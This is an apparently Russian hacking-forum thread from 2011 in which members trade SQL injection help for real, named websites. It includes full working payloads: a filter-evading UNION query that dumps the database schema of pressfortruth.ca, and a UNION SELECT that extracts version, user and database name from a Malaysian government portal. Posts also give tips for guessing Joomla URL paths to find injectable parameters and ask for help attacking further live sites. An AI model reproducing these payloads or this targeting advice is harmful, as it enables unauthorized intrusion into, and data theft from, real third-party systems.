15.12.2011, 22:40
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от shadowrun
http://pressfortruth.ca/dvd_dtls.php?rid=1%27+group+by+15+--+
Это делается так
Сообщение от None
http://pressfortruth.ca/dvd_dtls.php?rid=1'+union+/*!select*/+1,2,3,4,5,6,7,8,9,10,(/*!select*/(@x)from(/*!select*/(@x:=0x00),(/*!select*/(null)from(information_schema./*!columns*/)where(table_schema!=0x696e666f726d6174696f6e5f736 368656d61)and(0x00)in(@x:=/*!concat*/(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,c olumn_name))))x),12,13,14,15+--+
|
|
|
15.12.2011, 22:45
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
С нами:
8265206
Репутация:
84
|
|
er9j6@
Спасибо. Где можно получить подробности об этом способе?
|
|
|
|
16.12.2011, 00:00
|
|
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
С нами:
8686406
Репутация:
265
|
|
Сообщение от shadowrun
er9j6@
Спасибо. Где можно получить подробности об этом способе?
Это просто обход фильтров /*! */ () и т.д.
|
|
|
|
16.12.2011, 00:18
|
|
Новичок
Регистрация: 28.09.2011
Сообщений: 16
С нами:
7696406
Репутация:
0
|
|
Подскажите плиз, есть несколько сайтов, вроде как есть скули, но на сайтах стоит SEF, так что вижу только линки типа _http://site.com/london/1'
Как просмотреть полный путь можно?
|
|
|
|
16.12.2011, 00:21
|
|
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами:
7932566
Репутация:
81
|
|
Сообщение от dumpers_team
Подскажите плиз, есть несколько сайтов, вроде как есть скули, но на сайтах стоит SEF, так что вижу только линки типа _http://site.com/london/1'
Как просмотреть полный путь можно?
Скорее всего, дефолтные значения вроде index.php и т.п..
А вообще, чем тебе так мешает? хевидж не берёт?
Ещё отснифить можно...
|
|
|
|
16.12.2011, 01:59
|
|
Познающий
Регистрация: 07.11.2011
Сообщений: 91
С нами:
7638806
Репутация:
-6
|
|
Код:
http://www.terengganu.gov.my/maxc2020/portal/cms/redang/index_news.displaynews.php?counthit=1%27&newsid=10%27&from=search%27&cid=1%27&searchterm
Got this vuln, no where to start? |
|
|
|
16.12.2011, 02:21
|
|
Участник форума
Регистрация: 01.12.2011
Сообщений: 120
С нами:
7604246
Репутация:
55
|
|
Код:
http://www.terengganu.gov.my/maxc2020/portal/cms/redang/index_news.displaynews.php?newsid=-10'+union+select+1,2,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29/*
the site is vulnerable, then the most common sql
Сообщение от None
Скорее всего, дефолтные значения вроде index.php и т.п..
А вообще, чем тебе так мешает? хевидж не берёт?
Ещё отснифить можно...
интересно, чем и как ты будешь снифать чтобы узнать что скрываеться под чпу ?
Сообщение от None
Подскажите плиз, есть несколько сайтов, вроде как есть скули, но на сайтах стоит SEF, так что вижу только линки типа _http://site.com/london/1'
Как просмотреть полный путь можно?
Тебе остается только угадывать. Я не не разу не видел и не использовал sef, не знаю точно как он работает, качать исходники лень, но ссылки у джомлы однотипны, даже в плагинах почти всегда одни и теже параметры встречаются. Так что попробуй что то типа такого
Код:
/index.php?option=com_virtuemart&Itemid=97
/index.php?option=com_content&task=view&id=524&Itemid=271
может и повезет |
|
|
|
16.12.2011, 15:28
|
|
Познающий
Регистрация: 07.11.2011
Сообщений: 91
С нами:
7638806
Репутация:
-6
|
|
Thank you so much.
I have a String Based problem again.
Код:
http://motorcitydolls.net/partygal.php?id=-17
Not sure for a solution. Any help? |
|
|
|
16.12.2011, 19:09
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от lightangel
Thank you so much.
I have a String Based problem again.
Код:
http://motorcitydolls.net/partygal.php?id=-17
Not sure for a solution. Any help? I think that its not vulnerable
|
|
|
|
16.12.2011, 19:27
|
|
Новичок
Регистрация: 09.12.2011
Сообщений: 0
С нами:
7592726
Репутация:
0
|
|
В редакторе в админке при добавлении вот такого кода сохраняется вот такая штука как обойти её?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
